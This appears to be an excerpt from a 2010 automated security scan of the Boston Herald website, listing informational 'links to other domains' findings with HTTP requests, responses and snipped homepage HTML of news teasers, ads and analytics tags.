<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2010/11/07/vince-wilfork-on-todays-performance-we-played-the-way-we-practiced-like-crap/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/vince-wilfork.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2010/11/05/illegal-downloader-jammie-thomas-rasset-hit-with-15-million-fine/"><img src="http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/lifestyle/behind_the_wheel/?p=1147"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2010/11/06/postgame-notes-from-another-wild-night-at-the-garden/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/rondofeet.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=2210"><img src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2010/11/07/british-fear-factor-over-bay-state-jails/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/high_school/index.php/2010/11/05/fridays-high-school-football-schedule-2/"><img src="http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2010/11/07/money-matters-taking-a-look-at-red-sox-payroll/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=2367"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/baseball/other_mlb/view.bg?articleid=1294857"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/2ab65a_clee11082010.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg" alt="GRIEVING: A friend hugs Shondell Davis, the aunt of the stabbing victim, in Roxbury yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/18.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/04.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/format=comments&srvc=home&position=also">
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/general/view/20101108desperate_hours_franco_spends_time_with_hiker_who_survived_against_the_odds/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg" alt="James Franco in &lsquo;127 Hours.&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294669&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/3ec29e_07tosc1.jpg" border="0"
width="207" height="181" caption="Romantic, dramatic &lsquo;Tosca&rsquo; is a winner" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20101108tracked_down_michelle_mcgee_ty_law_lou_merloni_and_more/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg" alt="Michelle &#x2018;Bombshell&#x2019; McGee,left, and Revolution Rock Bar bartender Caela Scott." /></a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1294837&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/4e5b50_lil_11082010.jpg" border="0"
width="207" height="181" caption="Lil Wayne is free, but at what price?" />
</a>
...[SNIP]...
<a
href="/business/general/view/20101108caritas_sale_critic_hits_ethics_board/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg" alt="Martha Coakley." /></a>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<a
href="/jobfind/news/technology/view/20101108polaroid_goes_back_to_the_future_instant_cameras_set_for_age_of_internet/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="REPLAY: The &#36;90 300 Instant Camera(inset) replicates the function of the classic Polaroid camera - more or less, since the printout is about half the size. The &#36;200 Pogo offers both instant and digital photos." /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" style="margin-right:30px;"></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" style="margin-right:30px;"></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif"></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.11. http://bostonherald.com/includes/PointRollAds.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/PointRollAds.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /includes/PointRollAds.htm?pid=1120613S29320101007185847&redir=http://ads.undertone.com/ck.php%3Foaparams=2__bannerid=157484__campaignid=24780__zoneid=1232__UTLCA=1__cb=81ce1ec855874f8bb627e18891a50172__bk=lbjieb__id=16jt93yzfdp12x9z59zal9xo8__oadest=$CTURL$&pub=un1232&time=0|18:22|-6&flash=10&server=portalserve&bu=246791520 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:23:00 GMT
Server: Apache
Last-Modified: Thu, 27 Dec 2007 03:06:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/html; charset=UTF-8
Connection: close

<script type="text/javascript" src="http://psf.pointroll.com/pointroll/script/psf.js"></script>

8.12. http://bostonherald.com/index.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /index.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.bg?srvc=home&tab=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:41:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 152294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/politics/view/20101108go_for_it_scott_brown_2012s_the_perfect_opportunity_for_prez_bid/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Go for it, Scott Brown!"></a>
...[SNIP]...
<a href="/news/regional/view/20101108grim_reality_for_funeral_business/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20101107/369b895a4c_funetease_11082010.jpg" alt="&#x2018;NOT QUITTING&#x2019; : Gary Dessert, a wood-flooring expert from
Dover who owns the Casket Store, has been fined by the state for
offering inexpensive burials without a funeral director&#x2019;s license.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108grim_reality_for_funeral_business/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/news/regional/view/20101108ts_form_rains_over_function_in_south_end/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20101107/e5caeeddd1_OnTheT_210x45.jpg" alt="ELEMENT-ARY: T riders brave the elements at a South End bus stop during a rain storm last week."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108ts_form_rains_over_function_in_south_end/format=comments&srvc=home&position=2">
...[SNIP]...
<a href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3"><img src="http://multimedia.heraldinteractive.com/images/promo/20101108/913f79de63_bradytease_11082010.jpg" alt="BROWNTRODDEN: New England Patriots quarterback Tom Brady reflects on what went wrong at the end of the fourth quarter while losing to the Cleveland Browns."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a
                        href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3">
...[SNIP]...
<a href="/news/us_politics/view/20101108sen_lisa_murkowski_on_cusp_of_win_how_will_she_legislate/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/cb73f7_lisam11082010.jpg" alt="In this file photo from Sept. 24, 2010, Alaska&rsquo;s Republican U.S. Senator Lisa Murkowski addresses a group of supporters at her new Juneau, Alaska campaign headquarters. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/us_politics/view/20101108sen_lisa_murkowski_on_cusp_of_win_how_will_she_legislate/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/news/national/northeast/view/20101108vermont_yankee_shuts_down_after_radioactive_water_leak/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/b2d2ab_vermonty11082010.jpg" alt=" In this undated file aerial photo provided by Vermont Yankee Corporation, the Vermont Yankee nuclear power plant in Vernon, Vt. is shown."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/national/northeast/view/20101108vermont_yankee_shuts_down_after_radioactive_water_leak/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/business/real_estate/view/20101108salvatore_lupoli/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg" alt="LAWRENCE REVIVAL: Salvatore Lupoli, chief executive of Sal&#x2019;s Pizza, displays an aerial photo of his Riverwalk Properties
complex, where he has started on a second phase of construction.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/real_estate/view/20101108salvatore_lupoli/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg" alt="Robert &#x2018;Michele&#x2019; Kosilek.">
</a>
...[SNIP]...
